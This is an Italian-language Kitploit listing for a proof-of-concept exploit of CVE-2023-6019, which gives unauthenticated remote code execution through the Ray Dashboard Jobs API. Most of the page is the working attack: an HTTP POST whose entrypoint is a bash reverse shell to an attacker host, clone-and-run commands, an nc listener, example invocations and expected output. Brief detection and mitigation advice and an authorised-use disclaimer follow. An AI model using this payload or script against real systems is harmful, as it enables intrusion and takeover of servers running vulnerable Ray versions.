Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-6019 — Exploit PoC per CVE-2023-6019 - Esecuzione di codice remota tramite l'API Jobs non autenticata di Ray Dashboard. | Kitploit
Strumenti/GitHubGitHub/joaquinrrr/cve-2023-6019
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

Exploit PoC per CVE-2023-6019 - Esecuzione di codice remota tramite l'API Jobs non autenticata di Ray Dashboard.

Vedi Repository
62 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-6019 - Anyscale Ray Dashboard RCE non autenticata

PoC per CVE-2023-6019 — Esecuzione di codice in remoto tramite l'API Jobs della Ray Dashboard non autenticata.
Creato da oguiii


Descrizione

Anyscale Ray è un framework open-source per carichi di lavoro distribuiti di ML/AI. Le versioni precedenti alla 2.6.4 espongono un'API di sottomissione di job tramite la Ray Dashboard (porta predefinita 8265) senza alcuna autenticazione, consentendo a un attaccante non autenticato di inviare job arbitrari e ottenere Esecuzione di codice in remoto sull'host.

  • CVE: CVE-2023-6019
  • Gravità: Critica (CVSS 9.8)
  • Versioni interessate: Ray < 2.6.4
  • Risolto in: Ray 2.6.4
  • Vettore d'attacco: Rete (richiesta HTTP non autenticata)

Come funziona

L'endpoint /api/jobs/ accetta un payload JSON con un campo entrypoint che viene eseguito come comando shell dal processo worker di Ray - nessuna credenziale richiesta.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Utilizzo

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

Argomenti

Esempio

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Output previsto

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

Rilevamento

Cerca richieste POST inattese verso /api/jobs/ sulla porta 8265 nei tuoi log HTTP o nel traffico di rete.


Mitigazione

  • Aggiorna a Ray >= 2.6.4
  • Limita l'accesso alla porta della Ray Dashboard (8265) tramite regole firewall
  • Non esporre la Ray Dashboard a reti pubbliche

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Disclaimer

Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Ottieni sempre un'autorizzazione scritta adeguata prima di effettuare test.

Scarica lo strumento
FlagDescrizionePredefinito
-tIP o hostname del targetobbligatorio
-pPorta della Ray Dashboard8265
-lIP dell'attaccante (reverse shell)obbligatorio
-lpPorta dell'attaccante (reverse shell)obbligatorio